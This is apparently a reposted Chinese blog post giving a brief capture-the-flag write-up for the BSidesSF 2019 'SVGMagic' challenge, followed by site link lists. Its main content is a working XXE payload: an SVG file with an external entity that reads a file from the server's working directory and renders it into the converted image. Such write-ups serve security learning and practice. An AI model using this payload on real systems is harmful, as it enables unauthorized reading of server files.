[BSidesSF 2019]SVGMagic svg->png结合xxe任意文件去读

其他 2020-03-26 09:32:01 阅读次数: 0

payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>

这儿貌似需要用到绝对路径~~~

参考链接
wp

HyyMbb

发布了81 篇原创文章 · 获赞 10 · 访问量 1万+

私信关注

猜你喜欢

转载自blog.csdn.net/a3320315/article/details/104334735

[BSidesSF 2019]SVGMagic svg->png结合xxe任意文件去读

[BSidesSF 2019]Mixer CBC整块替换，拼凑技巧~~

[BSidesSF 2019]Mixer CBC整块替换，拼凑技巧

[BSidesSF2020]haystack

2019年CTF3月比赛记录（一）：BSidesSF 2019 CTF_Web部分题目writeup与重解

[BSidesSF2020]decrypt-2

WebLogic任意文件上传漏洞(CVE-2019-2618)

CVE-2019-4505：WebSphere任意文件读取漏洞警报

2019-11-13：Aria2任意文件写入漏洞

[vulhub]Weblogic weak_password+任意文件上传(CVE-2019-2618)

CVE-2019-5418:Ruby on Rails路径穿越与任意文件读取复现

Ruby on Rails路径穿越与任意文件读取（CVE-2019-5418）复现

Ruby on Rails 路径穿越与任意文件读取漏洞（CVE-2019-5418）复现

CVE-2019-11510 Pulse Connect Secure (PCS) SSL VP.N 任意文件读取漏洞

Ruby On Rails 路径穿越与任意文件读取漏洞（CVE-2018-3760、CVE-2019-5418）

春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)

XXE任意文件读取（当xml解析内容有输出时）

【1day】宏景OA SmsAcceptGSTXServlet接口 XXE漏洞学习——可读取任意文件

SVG-变换

SVG-标签

SVG-简介

任意文件读取

任意文件下载

任意文件上传

复现泛微OA e-cology XXE 漏洞（0day）——可读取任意文件

Confluence任意文件读取

MYSQl任意文件读取

任意文件下载漏洞

GlassFish 任意文件读取

任意文件下载(读取)

今日推荐

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

OOP第二次作业

java web 乱码问题

android 禁止scrollview 因控件变化自动滚动到底的方法

mysql服务解压版的安装(5.7)

centos7 nginx+tomcat配置https 安装免费SSL Let’s Encrypt

使用Mosquitto遗嘱机制实现感知客户端上下线功能的方法

面向对象之------多态与多态性

开发Teams Tabs应用程序

C# 希尔排序

第2章 Jupyter Notebooks

每日归档

更多

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)